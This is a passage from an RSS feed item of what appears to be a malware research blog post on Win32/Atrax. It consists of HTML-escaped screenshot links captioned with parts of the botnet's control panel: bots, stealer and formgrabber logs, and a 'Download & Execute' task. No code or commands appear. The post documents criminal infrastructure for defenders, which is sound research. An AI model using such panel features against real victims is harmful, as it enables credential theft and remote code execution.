&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbL9eo8Qscd55m21hCJp3M4qsTwdoyFkPH5_SadPYe5OSON_llx0jAkUttIrzhVCeRFo-dc5gHlbwyJ_-pykRrD8P3bvZirBcHnXr6_XrWPHGR3C6vD4bxSQ_Xt1i_8UvkMuIyheAnMiU/s1600/07-12-2013+00-48-24.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbL9eo8Qscd55m21hCJp3M4qsTwdoyFkPH5_SadPYe5OSON_llx0jAkUttIrzhVCeRFo-dc5gHlbwyJ_-pykRrD8P3bvZirBcHnXr6_XrWPHGR3C6vD4bxSQ_Xt1i_8UvkMuIyheAnMiU/s400/07-12-2013+00-48-24.png&quot; width=&quot;371&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
So, let&#39;s have a look from TOR.&lt;br /&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYG9G1Ar5KdrebxYyApNqBCeqY28TrsadSBrkZ8IGSu_ZeSRifFvbH4VV7Q2jXtgYpSUazjCxLuDPwL44ftTqmeI3lq0CabV8usIy_haqCEbQ26Y3TLQsW2wsm-F_Y9yWXYDQME9TErfQ/s1600/06-12-2013+17-18-10.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;177&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYG9G1Ar5KdrebxYyApNqBCeqY28TrsadSBrkZ8IGSu_ZeSRifFvbH4VV7Q2jXtgYpSUazjCxLuDPwL44ftTqmeI3lq0CabV8usIy_haqCEbQ26Y3TLQsW2wsm-F_Y9yWXYDQME9TErfQ/s400/06-12-2013+17-18-10.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUgPWzQELsSD0955dw8SdEcnWXgJdkmtIWFINx_7vcMajEP_o9T6goyHe488Sn1vYCowjOxcQuOPKQ9Fwmai4HPE6XR_yifxb8phdsW3dD39iYQBzRgKnrpfzSG-VVySbBJQhyphenhyphenT_tm28/s1600/06-12-2013+17-20-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;388&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUgPWzQELsSD0955dw8SdEcnWXgJdkmtIWFINx_7vcMajEP_o9T6goyHe488Sn1vYCowjOxcQuOPKQ9Fwmai4HPE6XR_yifxb8phdsW3dD39iYQBzRgKnrpfzSG-VVySbBJQhyphenhyphenT_tm28/s400/06-12-2013+17-20-02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Plugin statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxYbVo4kWNwLEKkwmqVCOojusRJvGT2-QeqWR3Cl1y7HpA09irR04R12zdcxaHK0FfWSphQCCXdxjSF794-wLWu42gF4zl60QqXQ21Tvf5SiCaNwSD5gdTSY5E0U8yQN8VMzkJBHYps8/s1600/07-12-2013+12-39-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;345&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxYbVo4kWNwLEKkwmqVCOojusRJvGT2-QeqWR3Cl1y7HpA09irR04R12zdcxaHK0FfWSphQCCXdxjSF794-wLWu42gF4zl60QqXQ21Tvf5SiCaNwSD5gdTSY5E0U8yQN8VMzkJBHYps8/s400/07-12-2013+12-39-41.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Spreader statistic:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe9Au-6YGOJW5C7cM1dTUhoSV8jqHHcMnFCKZaUsW86FqLHzuujBNqcYIjNZBqAS8P9HaxMnvxYWk7czcWdUKs6VWSGKbHtTruLqjULtTnpVlrXR5zDaTXuq79amjagiF-MRfsiKcXvQ/s1600/07-12-2013+12-41-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;345&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoe9Au-6YGOJW5C7cM1dTUhoSV8jqHHcMnFCKZaUsW86FqLHzuujBNqcYIjNZBqAS8P9HaxMnvxYWk7czcWdUKs6VWSGKbHtTruLqjULtTnpVlrXR5zDaTXuq79amjagiF-MRfsiKcXvQ/s400/07-12-2013+12-41-23.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bots:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Yh2JuVK_svYAxnBLYpwj7FSN8LNtm8j0u8_uFQVPDYyWlJay7fLawRs8q6lcswoVx78qg6m5bdwhtceBrLJKCcxdQzxd0HBE7ixNH8hKIdD1-ZiM0P9WQweSSy4VWuqcwNXQYU2T-1U/s1600/06-12-2013+17-21-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4Yh2JuVK_svYAxnBLYpwj7FSN8LNtm8j0u8_uFQVPDYyWlJay7fLawRs8q6lcswoVx78qg6m5bdwhtceBrLJKCcxdQzxd0HBE7ixNH8hKIdD1-ZiM0P9WQweSSy4VWuqcwNXQYU2T-1U/s400/06-12-2013+17-21-13.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bot legend:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir5uyOjUgKZ7oBI2j3woMO9oV8lMmfEKKC3I-JFxgRwRuIIZLyoiAF2kyTZNCkp-d0SCKXJejJPFpIqfG4Ym8OlixREHC2i-LgAlEUx16w70HaeBmvXq5F7rDoiU4fV_5mBy8TJdVm79U/s1600/06-12-2013+17-52-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir5uyOjUgKZ7oBI2j3woMO9oV8lMmfEKKC3I-JFxgRwRuIIZLyoiAF2kyTZNCkp-d0SCKXJejJPFpIqfG4Ym8OlixREHC2i-LgAlEUx16w70HaeBmvXq5F7rDoiU4fV_5mBy8TJdVm79U/s1600/06-12-2013+17-52-56.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bot information:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZkgzSuJJh4GLFiOk3JG6Jh22w_8HAW19AReu6FTzGNUy3esHLFa8NXky-y236PRIcd0IvVRfWOahUtN2y3usFjkaVxRFznKdszVMnTm-Z9rPMMQYF-mZUxApBdL_inlNdk7fjO7XKAgc/s1600/06-12-2013+17-27-07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;308&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZkgzSuJJh4GLFiOk3JG6Jh22w_8HAW19AReu6FTzGNUy3esHLFa8NXky-y236PRIcd0IvVRfWOahUtN2y3usFjkaVxRFznKdszVMnTm-Z9rPMMQYF-mZUxApBdL_inlNdk7fjO7XKAgc/s400/06-12-2013+17-27-07.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
AtraxStealer plugin logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2K9hqXOfc6lG0uM0pDr7bQ3EuVS_-oGjljjWYsMQV1jH-UGrDaverCXLUfZUokR8FSGYTiVKmCyPufoZe1XipJ3egvIGMOSdoxxDJ0BdJTdN5akFoO36_w9XZ2dgzfCjFm_um7EH-XuQ/s1600/06-12-2013+17-29-00.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2K9hqXOfc6lG0uM0pDr7bQ3EuVS_-oGjljjWYsMQV1jH-UGrDaverCXLUfZUokR8FSGYTiVKmCyPufoZe1XipJ3egvIGMOSdoxxDJ0BdJTdN5akFoO36_w9XZ2dgzfCjFm_um7EH-XuQ/s400/06-12-2013+17-29-00.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Formgrabber plugin logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxpku3IQPfiKnuU77CQMay2pHJOUMjvIlWqkblcF3teCB_wxn2svdwq5pdH8Y3wFjK769F8-eedyOxctnhhWjbUf81wR1GMhrCYA7B5-ZknIVY7J9gWt3PLAbyZBznHlMYA2S6Hhf8tTE/s1600/06-12-2013+17-30-57.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;365&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxpku3IQPfiKnuU77CQMay2pHJOUMjvIlWqkblcF3teCB_wxn2svdwq5pdH8Y3wFjK769F8-eedyOxctnhhWjbUf81wR1GMhrCYA7B5-ZknIVY7J9gWt3PLAbyZBznHlMYA2S6Hhf8tTE/s400/06-12-2013+17-30-57.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Formgrabber plugin logs detail:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qzKgKQQXznIh4191NgR13hUgiO5gAiIK31h6sRpRrV_yByD1A-_Ssx86-_UdMXfyOO73o_npphPMX6ufkIPjgtSAvhC0LLeSEZtd797mUlj75TglpusPDS_wEZR1q4XOJ9BWtnvFQ8Y/s1600/06-12-2013+17-34-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;257&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7qzKgKQQXznIh4191NgR13hUgiO5gAiIK31h6sRpRrV_yByD1A-_Ssx86-_UdMXfyOO73o_npphPMX6ufkIPjgtSAvhC0LLeSEZtd797mUlj75TglpusPDS_wEZR1q4XOJ9BWtnvFQ8Y/s400/06-12-2013+17-34-06.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Plugins:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXNc3qoOEyIJNbWNoepmOC7TgZBIgkGkLsEW1zBb4AK3XzIc6Az1HrgXtn2sFpKmXHRRgDTaSc1VmcXsTJPD55VxkL2aU8rBADFePqO_xKUgLDc7KsHYKBweyfNUzekz-VBnBQXdMe2ok/s1600/06-12-2013+17-46-51.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;242&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXNc3qoOEyIJNbWNoepmOC7TgZBIgkGkLsEW1zBb4AK3XzIc6Az1HrgXtn2sFpKmXHRRgDTaSc1VmcXsTJPD55VxkL2aU8rBADFePqO_xKUgLDc7KsHYKBweyfNUzekz-VBnBQXdMe2ok/s400/06-12-2013+17-46-51.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Tasks:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoQJjvKmF6sSj9pYzZ8sryKHSuooPNS0vYYAxiQLbrxMSaw4UlgrUK-Qw-nyuG5AD9bRD2cM6UK0MDKTa3UeC1MOkqt8pp6leADLfBTibWxg99oUpVSmd9MUnbZpRFQdr1YtjsQKwcF4/s1600/06-12-2013+17-47-19.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;218&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoQJjvKmF6sSj9pYzZ8sryKHSuooPNS0vYYAxiQLbrxMSaw4UlgrUK-Qw-nyuG5AD9bRD2cM6UK0MDKTa3UeC1MOkqt8pp6leADLfBTibWxg99oUpVSmd9MUnbZpRFQdr1YtjsQKwcF4/s400/06-12-2013+17-47-19.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Create a new task:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYzkIfvQhCPVxjbRiytUF6pWTLt97z20B4JK50dfjr6tB8iAHeNHjbmmDqI6sz-deHbATCvYh73M0eSPv5GG5tk7kF96EpA4fkSrof9rZn9mT2fNsJzdyyWiRwGcII05Fc6EludsPxoLg/s1600/06-12-2013+17-59-25.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYzkIfvQhCPVxjbRiytUF6pWTLt97z20B4JK50dfjr6tB8iAHeNHjbmmDqI6sz-deHbATCvYh73M0eSPv5GG5tk7kF96EpA4fkSrof9rZn9mT2fNsJzdyyWiRwGcII05Fc6EludsPxoLg/s1600/06-12-2013+17-59-25.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Task setting for &#39;Download &amp;amp; Execute&#39;:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMEqK7TtLVVFBQkc4wZCbr8f4O-skNKgV4Dckmif2B5l_T_oxF3nnbSxGNDZ9CcWVXva58w-D5Ta7uGACRqI6q5W4RSvk46_0Z-Cm8fUXOnxbvbfFiwgghsbSOsyPi2_13nGsuWwk-lq8/s1600/06-12-2013+18-00-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMEqK7TtLVVFBQkc4wZCbr8f4O-skNKgV4Dckmif2B5l_T_oxF3nnbSxGNDZ9CcWVXva58w-D5Ta7uGACRqI6q5W4RSvk46_0Z-Cm8fUXOnxbvbfFiwgghsbSOsyPi2_13nGsuWwk-lq8/s400/06-12-2013+18-00-31.png&quot; width=&quot;378&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Task execution:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiceHDmy3XZC8kV_b_tAVznZp2NPHZjb7ejWeUxhyphenhyphenMvEJc20jwVQroKAHCSlQc2ISCF-rkRdcon4FYtJ56dzGmtVKfgLtDPkDVzuhEuZvgaX7vmukF7MUQGo6lwmJIDjL-VVqUEUpmBXnk/s1600/06-12-2013+17-47-35.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiceHDmy3XZC8kV_b_tAVznZp2NPHZjb7ejWeUxhyphenhyphenMvEJc20jwVQroKAHCSlQc2ISCF-rkRdcon4FYtJ56dzGmtVKfgLtDPkDVzuhEuZvgaX7vmukF7MUQGo6lwmJIDjL-VVqUEUpmBXnk/s400/06-12-2013+17-47-35.png&quot; width=&quot;348&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Edit a task:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rzSYFak5z5iRXu6VjAeCAgTALpUnZqfEMzJ7HY9rKKIw4NXYq8Z1BkhqWnBG2x79axo5d7KeF_ulwux41u-Mr2-zrHEj7veAIxeqc84o_VtDVxeHeaEEvwTV-hqcJzSglFbj-MHuI1E/s1600/06-12-2013+17-48-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;261&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rzSYFak5z5iRXu6VjAeCAgTALpUnZqfEMzJ7HY9rKKIw4NXYq8Z1BkhqWnBG2x79axo5d7KeF_ulwux41u-Mr2-zrHEj7veAIxeqc84o_VtDVxeHeaEEvwTV-hqcJzSglFbj-MHuI1E/s400/06-12-2013+17-48-01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQckq1Fb2XtV56vfhvBD2dvofGhM6O-7LBBZdmwkjdJXGjkD4vsDdXfIe5jNOGJQkdonsQXzErZzrvsQbhroxIzvlKwGkwzRuRCXpHfLcN9ChPVYyRBcfijggHE7Zn_0g1nSPE-u1NpHs/s1600/06-12-2013+17-51-14.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;287&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQckq1Fb2XtV56vfhvBD2dvofGhM6O-7LBBZdmwkjdJXGjkD4vsDdXfIe5jNOGJQkdonsQXzErZzrvsQbhroxIzvlKwGkwzRuRCXpHfLcN9ChPVYyRBcfijggHE7Zn_0g1nSPE-u1NpHs/s400/06-12-2013+17-51-14.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihWRm5z5Jl0jlIUF4RdQMr9N69_JG6LW548kLriPvC586NF1BzhVsaj0DqMi03KOEVo_jZXOag4amxgQKHf-NAB4m1Hm5oV6FVmWj7PN9MO4UmVfJjllsvR6otBu-Fz1EEU7lZ8Wt8ec/s1600/1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;225&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihWRm5z5Jl0jlIUF4RdQMr9N69_JG6LW548kLriPvC586NF1BzhVsaj0DqMi03KOEVo_jZXOag4amxgQKHf-NAB4m1Hm5oV6FVmWj7PN9MO4UmVfJjllsvR6otBu-Fz1EEU7lZ8Wt8ec/s400/1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://www.xylibox.com/2013/12/win32atraxa.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBHg4b43TgJY4MUbfXN2W49jworAMSYm2Nlv4BdGoTvRqeA5uTyJWgtoOYjaiL4bSonjZiilsvogG4bHjCuqXbmDo5iCy_bGvWOszI4PPfgCQm3JkWFmCxDAipdahoZFKVGudoeMaoYgc/s72-c/06-12-2013+18-07-59.png" height="72" width="72"/><thr:total>11</thr:total></item></channel></rss>